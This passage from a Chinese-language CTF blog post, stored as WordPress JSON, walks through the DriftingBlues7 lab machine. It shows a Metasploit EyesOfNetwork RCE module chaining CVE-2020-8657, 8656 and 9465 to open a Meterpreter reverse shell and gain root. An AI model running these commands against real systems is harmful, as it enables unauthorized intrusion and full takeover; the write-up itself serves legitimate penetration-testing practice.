https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        443              yes       The target port (TCP)\n   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)\n   SSL          true             no        Negotiate SSL\/TLS for outgoing connections\n   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)\n   TARGETURI    \/                yes       Base path to EyesOfNetwork\n   URIPATH                       no        The URI to use for this exploit (default is random)\n   VHOST                         no        HTTP server virtual host\n\n   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li\n                                       sten on all addresses.\n   SRVPORT  8080             yes       The local port to listen on.\n\nPayload options (linux\/x64\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST                   yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   1   Linux (x64)\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; set rhosts 172.20.10.6\nrhosts =&gt; 172.20.10.6\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; exploit\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)\n[+] The target appears to be vulnerable. Target is EyesOfNetwork 5.3 or older with API version 2.4.2.\n[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.\n[*] Using generated API key: 593ab303a223a1a885c6f4be0e1eeb46145a248144a8d0318f315ba6d1d85c26\n[-] Generated API key does not match.\n[*] Using API key obtained via SQL injection: 593ab303a223a1a885c6f4be0e1eeb46145a248144a8d0318f315ba6d1d85c26\n[-] Failed to obtain valid API key.\n[*] Attempting exploitation using CVE-2020-9465.\n[+] The target seems vulnerable.\n[*] Verified that the admin user has at least one active session.\n[*] Calculating the admin &#039;session_id&#039; value. This will take a while...\n[+] Obtained admin &#039;session_id&#039; value: 358748692\n[*] Command Stager progress - 100.00% done (897\/897 bytes)\n[*] Sending stage (3045380 bytes) to 172.20.10.6\n[*] Meterpreter session 1 opened (172.20.10.8:4444 -&gt; 172.20.10.6:33520) at 2024-04-12 06:08:35 -0400\n\nmeterpreter &gt; cd \/tmp\nmeterpreter &gt; shell\nProcess 25767 created.\nChannel 1 created.\nwhoami\nroot\nscript -c bash \/dev\/null\n[root@driftingblues tmp]# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n[root@driftingblues tmp]# cd \/root\n[root@driftingblues ~]# ls\nanaconda-ks.cfg  eon  index.htm  index_files  root.txt  upit.sh  user.txt<\/code><\/pre>\n<p>\u53ef\u4ee5\u62ff\u5230shell\uff0c\u81ea\u6b64\uff0c\u5b8c\u6210\u6253\u9776\uff0c\u524d\u9762\u7684\u90a3\u4e2a\u4e0d\u884c\u53ea\u4ee3\u8868\u6211\u4e0d\u884c\u55f7\uff0c\u53ef\u80fd\u662f\u54ea\u91cc\u64cd\u4f5c\u5931\u8bef\u4e86\uff0c\u5982\u679c\u6709\u5e08\u5085\u77e5\u9053\u54ea\u9519\u4e86\uff0c\u53ef\u4ee5\u544a\u8bc9\u6211\u4e00\u624b\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues7 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.6 &#8212; -A  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-538","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=538"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538\/revisions"}],"predecessor-version":[{"id":541,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538\/revisions\/541"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=538"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=538"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=538"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}